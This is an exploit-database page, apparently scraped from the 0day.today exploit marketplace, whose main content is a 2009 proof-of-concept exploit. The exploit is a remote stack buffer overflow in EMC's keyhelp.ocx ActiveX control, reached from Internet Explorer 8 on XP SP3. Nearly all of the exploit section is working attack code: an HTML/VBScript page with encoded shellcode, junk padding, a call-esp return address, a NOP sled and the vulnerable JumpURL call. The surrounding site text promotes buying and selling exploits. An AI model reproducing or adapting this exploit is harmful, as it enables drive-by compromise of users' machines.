0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Multiple EMC products utilizing keyhelp.ocx 1.2.312
=================================================== Multiple EMC products utilizing keyhelp.ocx 1.2.312 =================================================== # Title: Multiple EMC products utilizing keyhelp.ocx 1.2.312 # CVE-ID: () # OSVDB-ID: () # Author: Pyrokinesis # Published: 2009-09-29 # Verified: yes view source print? <!-- EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote buffer overflow exploit (ie8 xp sp3) by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ tested products: EMC Captiva QuickScan Pro 4.6 sp1 EMC Documentum ApllicationXtender Desktop 5.4 and possibly other products carrying quickscan CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C} Progid: KeyHelp.KeyCtrl.1 Binary Path: C:\WINDOWS\system32\KeyHelp.ocx KillBitted: False Implements IObjectSafety: True Safe For Initialization (IObjectSafety): True Safe For Scripting (IObjectSafety): True JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow eip is overwritten after 537 bytes through the second argument, you can touch SEH even --> <html> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' /> </object> <script language='vbscript'> //executing calc scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") jnk = string(537,"A") eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll nop = string(16,unescape("%90")) mapID=1 pstrChmFile= jnk + eip + nop + scode pstrFrame="aaaaaaaa" 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame </script> # 0day.today [2024-12-25] #